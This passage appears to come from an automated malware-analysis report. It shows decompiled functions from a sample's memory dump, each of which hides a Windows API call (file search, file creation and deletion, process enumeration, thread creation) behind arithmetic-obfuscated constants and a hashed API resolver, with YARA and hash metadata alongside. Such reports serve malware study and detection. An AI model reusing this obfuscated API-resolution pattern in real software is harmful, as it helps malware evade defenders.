                                                      				_v12 = _v12 ^ 0x1d0c124c;
                                                      				_v12 = _v12 ^ 0x1d0c2b7f;
                                                      				E002307A9(0xe8880df4, 0x9164b7cc, __ecx, __ecx, 0x196);
                                                      				_t27 = FindNextFileW(_t33, _a4); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • FindNextFileW.KERNEL32(?,1D0C2B7F), ref: 002259CE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FileFindNext
                                                      • String ID: 4
                                                      • API String ID: 2029273394-293933855
                                                      • Opcode ID: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                                      • Instruction ID: 9db6eecf0f5261ba075a84a789176aa98df66d05aa670ac8871c2e06ca86f31e
                                                      • Opcode Fuzzy Hash: 7c87f46dbf01ac71fdd96b1192808780aa717a036f6e3d3bbce4727d036999bd
                                                      • Instruction Fuzzy Hash: 70014676D11218BBEB14DFA4D84A8DEBE78EF40354F108188E80867250E7B25F249BA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 66%
                                                      			E00234F7D(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t17;
                                                      				int _t24;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0022602B(_t17);
                                                      				_v12 = 0xddd8;
                                                      				_v12 = _v12 * 0x48;
                                                      				_v12 = _v12 ^ 0x003e66d8;
                                                      				_v8 = 0xcb35;
                                                      				_v8 = _v8 ^ 0x7b88573c;
                                                      				_v8 = _v8 * 0x59;
                                                      				_v8 = _v8 ^ 0xf27e4a21;
                                                      				E002307A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
                                                      				_t24 = CloseHandle(_a4); // executed
                                                      				return _t24;
                                                      			}







                                                      APIs
                                                      • CloseHandle.KERNEL32(003E66D8), ref: 00234FE2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandle
                                                      • String ID: {#lm
                                                      • API String ID: 2962429428-1564096886
                                                      • Opcode ID: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                                      • Instruction ID: 425c42de30eaec02a6b06aeb807420b13a9b3e840beb4bdeece3b006ea06cbfa
                                                      • Opcode Fuzzy Hash: 7df0185c2930fb0200a486f9c33d29b23fc7f0daa0c3c6090cb6242b0ea75d03
                                                      • Instruction Fuzzy Hash: E9F037B181120CFFDB04DFA4D98689EBFBAEB40300F208199E804AB250D3715B50AB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 43%
                                                      			E0023375D(void* __edx, WCHAR* _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, DWORD* _a32, intOrPtr _a36, intOrPtr _a44, intOrPtr _a52) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				WCHAR* _v16;
                                                      				WCHAR* _v20;
                                                      				intOrPtr _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t35;
                                                      				int _t42;
                                                      				signed int _t43;
                                                      
                                                      				_push(_a52);
                                                      				_push(0);
                                                      				_push(_a44);
                                                      				_push(0);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(0);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(0);
                                                      				E0022602B(_t35);
                                                      				_v28 = 0x6b2c80;
                                                      				_v24 = 0x4fb02;
                                                      				_v20 = 0;
                                                      				_v16 = 0;
                                                      				_v8 = 0xe6a1;
                                                      				_v8 = _v8 ^ 0xa0873718;
                                                      				_v8 = _v8 + 0xffffab24;
                                                      				_v8 = _v8 ^ 0x2595dee0;
                                                      				_v8 = _v8 ^ 0x8512f71c;
                                                      				_v12 = 0x8058;
                                                      				_t43 = 5;
                                                      				_v12 = _v12 / _t43;
                                                      				_v12 = _v12 ^ 0x000051c4;
                                                      				E002307A9(0xb356cba0, 0x9164b7cc, _t43, _t43, 0x178);
                                                      				_t42 = GetVolumeInformationW(_a12, 0, 0, _a32, 0, 0, 0, 0); // executed
                                                      				return _t42;
                                                      			}












                                                      APIs
                                                      • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0023380A
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InformationVolume
                                                      • String ID:
                                                      • API String ID: 2039140958-0
                                                      • Opcode ID: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                                      • Instruction ID: 20776f41622532531ab99a97fcf37a9e1e38b73e794eda9eeb744ac407c128c5
                                                      • Opcode Fuzzy Hash: 6496ad685a24056dcbb86ceb1cdfa10e7083617a585bea956de5cffdf49062df
                                                      • Instruction Fuzzy Hash: 4E1117B1802219BBCF55DF95DD098DF7EB9EF49360F104048F90862160C3B14A64DBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 31%
                                                      			E0022B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t32;
                                                      				void* _t38;
                                                      				long _t47;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a48);
                                                      				_t47 = __edx;
                                                      				_push(_a44);
                                                      				_push(_a40);
                                                      				_push(_a36);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(0);
                                                      				_push(_a16);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(0);
                                                      				E0022602B(_t32);
                                                      				_v8 = 0xfd14;
                                                      				_v8 = _v8 >> 4;
                                                      				_v8 = _v8 * 0x7a;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 ^ 0x00002bef;
                                                      				_v12 = 0x4f26;
                                                      				_v12 = _v12 | 0xe7e97f76;
                                                      				_v12 = _v12 ^ 0xe7e94dbb;
                                                      				E002307A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
                                                      				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
                                                      				return _t38;
                                                      			}








                                                      APIs
                                                      • CreateFileW.KERNEL32(A45C8003,?,9C67384B,00000000,0ADDA027,53345D77,00000000), ref: 0022B5FD
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp Download File
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp Download File
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                                      • Instruction ID: e1549cc0f43a334951d18b49cf8d68a4c31339b5c1d8a32f795c95a95794c2c5
                                                      • Opcode Fuzzy Hash: 9acf8576e3394791eb4e7fd0c5ab37ca1dcf6349e082c5cec40e4e9b6d9fd2f2
                                                      • Instruction Fuzzy Hash: 8511C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862120D3729A20EB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E002336D3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _v24;
                                                      				intOrPtr _v28;
                                                      				void* _t23;
                                                      				intOrPtr* _t30;
                                                      				void* _t31;
                                                      				void* _t32;
                                                      				signed int _t34;
                                                      				void* _t41;
                                                      
                                                      				_t41 = __edx;
                                                      				_t32 = __ecx;
                                                      				E0022602B(_t23);
                                                      				_v28 = 0x12ca0f;
                                                      				asm("stosd");
                                                      				asm("stosd");
                                                      				_t34 = 0x2d;
                                                      				asm("stosd");
                                                      				_v8 = 0xdb27;
                                                      				_v8 = _v8 >> 9;
                                                      				_v8 = _v8 / _t34;
                                                      				_v8 = _v8 ^ 0x000020cb;
                                                      				_v12 = 0x489;
                                                      				_v12 = _v12 | 0x46cddb89;
                                                      				_v12 = _v12 ^ 0x46cde771;
                                                      				_t30 = E002307A9(0x9dd48097, 0x9164b7cc, _t34, _t34, 0x113);
                                                      				_t31 =  *_t30(_t32, _t41, __ecx, __edx, _a4, _a8); // executed
                                                      				return _t31;
                                                      			}













                                                      APIs
                                                      • ProcessIdToSessionId.KERNEL32(00000000,00000000,?,?,?,?,00000000,1B7BC3FB,?), ref: 00233754
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ProcessSession
                                                      • String ID:
                                                      • API String ID: 3779259828-0
                                                      • Opcode ID: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                                      • Instruction ID: 8950e798ceb59e84ea673d3fc825d95103d2deae560040c10a273ffc93ff1ce0
                                                      • Opcode Fuzzy Hash: 6deb829caf7ef43e93cab8b3b2866dc601534bac041292c3f842473e6acf7ff5
                                                      • Instruction Fuzzy Hash: F5019675A01208FBEB04DBA9DC469DFFF74EF44364F104055E604A7251D7715F148BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E00221132(void* __ecx, intOrPtr _a8, void* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, _Unknown_base(*)()* _a32) {
                                                      				unsigned int _v8;
                                                      				signed int _v12;
                                                      				void* _t27;
                                                      				void* _t33;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(0);
                                                      				_push(_a32);
                                                      				_push(_a28);
                                                      				_push(_a24);
                                                      				_push(_a20);
                                                      				_push(_a16);
                                                      				_push(0);
                                                      				_push(_a8);
                                                      				_push(0);
                                                      				_push(0);
                                                      				_push(__ecx);
                                                      				E0022602B(_t27);
                                                      				_v12 = 0xe2c5;
                                                      				_v12 = _v12 * 0x1f;
                                                      				_v12 = _v12 | 0x070d55ff;
                                                      				_v12 = _v12 ^ 0x071f7e34;
                                                      				_v8 = 0x91c3;
                                                      				_v8 = _v8 + 0xffff5023;
                                                      				_v8 = _v8 << 0xd;
                                                      				_v8 = _v8 >> 1;
                                                      				_v8 = _v8 ^ 0x7e1e17b8;
                                                      				E002307A9(0x4bc4bb1d, 0x9164b7cc, __ecx, __ecx, 0x235);
                                                      				_t33 = CreateThread(0, 0, _a32, _a16, 0, 0); // executed
                                                      				return _t33;
                                                      			}








                                                      APIs
                                                      • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 002211BA
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateThread
                                                      • String ID:
                                                      • API String ID: 2422867632-0
                                                      • Opcode ID: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                                      • Instruction ID: f979beb798bb3cf82720fb2492394f1c7773163b0efac75937ca00d93acb2ec0
                                                      • Opcode Fuzzy Hash: cb0553482c322abf97d8835eeb0e28c15587e3b703a410a188fde19c900adf13
                                                      • Instruction Fuzzy Hash: 5801F772902229BBCF15DFE5DD49CDFBFB9EF09254F104188F90962250D2729A60EBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 54%
                                                      			E0023981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				void* _t28;
                                                      				void* _t34;
                                                      				long _t37;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a16);
                                                      				_t34 = __edx;
                                                      				_t37 = __ecx;
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__edx);
                                                      				_push(__ecx);
                                                      				E0022602B(_t22);
                                                      				_v12 = 0xe68;
                                                      				_v12 = _v12 * 0x39;
                                                      				_v12 = _v12 ^ 0xd1b1d871;
                                                      				_v12 = _v12 ^ 0xd1b2fb7e;
                                                      				_v8 = 0x629e;
                                                      				_v8 = _v8 + 0xfffff5da;
                                                      				_v8 = _v8 | 0xbef7b77b;
                                                      				_v8 = _v8 ^ 0xbef79fc3;
                                                      				E002307A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
                                                      				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
                                                      				return _t28;
                                                      			}










                                                      APIs
                                                      • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00001000,?,?,?,002287F2,0000CAAE,0000510C,AD82F196), ref: 0023989B
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocateHeap
                                                      • String ID:
                                                      • API String ID: 1279760036-0
                                                      • Opcode ID: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                                      • Instruction ID: befe9fe0183202295763c4f616bb3e888194596f68a67a8b2acadb36196cd915
                                                      • Opcode Fuzzy Hash: 8a0768dde0e7bf2d58d74200d499b49337f1603158062c9f943970ef98f7e083
                                                      • Instruction Fuzzy Hash: 92015A76801208FBDB04EFE5DC46CDFBF79EF85750F108199F918A6220E6719B619BA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 76%
                                                      			E00239AC7(void* __ecx, void* __edx, struct tagPROCESSENTRY32W _a4, intOrPtr _a8, void* _a12) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t26;
                                                      				int _t33;
                                                      				signed int _t35;
                                                      
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				E0022602B(_t26);
                                                      				_v12 = 0x3a37;
                                                      				_t35 = 0x5f;
                                                      				_v12 = _v12 / _t35;
                                                      				_v12 = _v12 << 3;
                                                      				_v12 = _v12 ^ 0x0000271a;
                                                      				_v8 = 0x41ad;
                                                      				_v8 = _v8 ^ 0xae17da57;
                                                      				_v8 = _v8 + 0xffff40f3;
                                                      				_v8 = _v8 ^ 0xae16a338;
                                                      				E002307A9(0xfb40698d, 0x9164b7cc, _t35, _t35, 0x16d);
                                                      				_t33 = Process32NextW(_a12, _a4); // executed
                                                      				return _t33;
                                                      			}









                                                      APIs
                                                      • Process32NextW.KERNEL32(DDC40DBA,0000271A), ref: 00239B3F
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: NextProcess32
                                                      • String ID:
                                                      • API String ID: 1850201408-0
                                                      • Opcode ID: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                                      • Instruction ID: 8856c84a7c8f292e5e28539e4a4c9052b83e022692b5ed9d593964a9c1869230
                                                      • Opcode Fuzzy Hash: 6b7eb41694d76787e9a8305cca19d9506a715d0ec903bcb9295f44bd3fa0cb58
                                                      • Instruction Fuzzy Hash: 1F014BB1910208BFEF04DFA4CC4A8AEBFB5EF44350F108098F509A6291D7B29B609F50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00227663(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a20) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t22;
                                                      				intOrPtr* _t26;
                                                      				void* _t27;
                                                      
                                                      				E0022602B(_t22);
                                                      				_v12 = 0xe6d;
                                                      				_v12 = _v12 | 0x830368b1;
                                                      				_v12 = _v12 ^ 0x83037da7;
                                                      				_v8 = 0xe4f2;
                                                      				_v8 = _v8 << 0xc;
                                                      				_v8 = _v8 << 5;
                                                      				_v8 = _v8 ^ 0xc9e423b1;
                                                      				_t26 = E002307A9(0xeb8f70d2, 0x9164b7cc, __ecx, __ecx, 0xc5);
                                                      				_t27 =  *_t26(_a4, 0, _a8, _a12, __ecx, __edx, _a4, _a8, _a12, 0, _a20, __ecx, __ecx); // executed
                                                      				return _t27;
                                                      			}









                                                      APIs
                                                      • QueryFullProcessImageNameW.KERNEL32(83037DA7,00000000,?,?,?,?,?,?,0022620E,00000000,?,?), ref: 002276D5
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuery
                                                      • String ID:
                                                      • API String ID: 3578328331-0
                                                      • Opcode ID: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                                      • Instruction ID: 6162874eb0240c662fbcb690ffd50800457956f9fbc25523f509d7e536b95c77
                                                      • Opcode Fuzzy Hash: bb76f6c44c895bfb25ee897b27b410d4dad05f10fad42bd9a76b8a10b629559e
                                                      • Instruction Fuzzy Hash: 05014B7690020CBFEF059F90CC06AAEBF75EB44700F108188F91426260D2B29B609B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E0023AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a12);
                                                      				_push(_a8);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0022602B(_t21);
                                                      				_v12 = 0xcc49;
                                                      				_v12 = _v12 << 6;
                                                      				_v12 = _v12 >> 2;
                                                      				_v12 = _v12 ^ 0x000ca988;
                                                      				_v8 = 0x5d85;
                                                      				_v8 = _v8 | 0xb9d19a55;
                                                      				_v8 = _v8 * 0xd;
                                                      				_v8 = _v8 ^ 0x6fa87272;
                                                      				E002307A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
                                                      				_t27 = DeleteFileW(_a12); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • DeleteFileW.KERNEL32(?,?,?,?,A6E18774,?,?), ref: 0023AAA8
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: DeleteFile
                                                      • String ID:
                                                      • API String ID: 4033686569-0
                                                      • Opcode ID: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                                      • Instruction ID: 9cd5d96fc3e82e5584044280d79d9400fa05233e4d0ba42093466a1b2956cd93
                                                      • Opcode Fuzzy Hash: 7e7ec6139e26a230cd8135b14def708b179dcfffbd3619458be635df9660073b
                                                      • Instruction Fuzzy Hash: 37F069B191020CFFDF08DFA4DD4A89EBFB4EB40304F108088F805A6250D3B29B649B50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 58%
                                                      			E00239A56(void* __ecx, void* __edx, intOrPtr _a4) {
                                                      				signed int _v8;
                                                      				unsigned int _v12;
                                                      				void* _t18;
                                                      				intOrPtr* _t22;
                                                      				void* _t23;
                                                      				void* _t28;
                                                      				void* _t29;
                                                      
                                                      				_t29 = __ecx;
                                                      				E0022602B(_t18);
                                                      				_v12 = 0x9a38;
                                                      				_v12 = _v12 >> 5;
                                                      				_v12 = _v12 ^ 0x00004339;
                                                      				_v8 = 0x299d;
                                                      				_v8 = _v8 + 0xa1ce;
                                                      				_v8 = _v8 | 0xc5f89a67;
                                                      				_v8 = _v8 + 0x125d;
                                                      				_v8 = _v8 ^ 0xc5f8b599;
                                                      				_t22 = E002307A9(0x9f217491, 0x9164b7cc, __ecx, __ecx, 0x24e);
                                                      				_t23 =  *_t22(_t29, __ecx, __edx, _a4, _t28, __ecx, __ecx); // executed
                                                      				return _t23;
                                                      			}











                                                      APIs
                                                      • GetNativeSystemInfo.KERNEL32(?), ref: 00239AC0
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: InfoNativeSystem
                                                      • String ID:
                                                      • API String ID: 1721193555-0
                                                      • Opcode ID: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                                      • Instruction ID: c1803f6b018883b58f743beabe4633ad6e2721f76a5aa50bad52841a68c18480
                                                      • Opcode Fuzzy Hash: d65cde782a32ae4a61f5c671309387e83e2548c40be7c0fa0ef700a92d4bef80
                                                      • Instruction Fuzzy Hash: CEF037B1911218FFEB08DB94E94A8DEBAB8EF41314F108088F40466240E7B55F649BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E00225FB2(void* __ecx, void* __edx, void* _a4) {
                                                      				signed int _v8;
                                                      				signed int _v12;
                                                      				void* _t21;
                                                      				int _t27;
                                                      
                                                      				_push(__ecx);
                                                      				_push(__ecx);
                                                      				_push(_a4);
                                                      				_push(__ecx);
                                                      				E0022602B(_t21);
                                                      				_v12 = 0x33d;
                                                      				_v12 = _v12 + 0xc3dc;
                                                      				_v12 = _v12 | 0x39ccfb02;
                                                      				_v12 = _v12 ^ 0x39ccf342;
                                                      				_v8 = 0xe8d9;
                                                      				_v8 = _v8 * 0x16;
                                                      				_v8 = _v8 | 0x4145347f;
                                                      				_v8 = _v8 ^ 0x9035ef96;
                                                      				_v8 = _v8 ^ 0xd1609914;
                                                      				E002307A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
                                                      				_t27 = CloseServiceHandle(_a4); // executed
                                                      				return _t27;
                                                      			}








                                                      APIs
                                                      • CloseServiceHandle.ADVAPI32(39CCF342), ref: 00226025
                                                      Memory Dump Source
                                                      • Source File: 0000000E.00000002.2347951504.0000000000221000.00000020.00000001.sdmp, Offset: 00220000, based on PE: true
                                                      • Associated: 0000000E.00000002.2347946463.0000000000220000.00000004.00000001.sdmp
                                                      • Associated: 0000000E.00000002.2347967604.000000000023C000.00000004.00000001.sdmp
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID:
                                                      • API String ID: 1725840886-0
                                                      • Opcode ID: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                                      • Instruction ID: 387793bae81884d9a14c57a036e56674b9d0b2d7ca770b560513c090cdc2bd9c
                                                      • Opcode Fuzzy Hash: 3cfd88833e1ee3d7eb973bd6275b1c25da7f4a486528241d7f18c0759c34379f
                                                      • Instruction Fuzzy Hash: 88F04FB0C11208FFDB08DFA0E94689EBFB8EB40300F208198E409A7260E7B19F159F54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions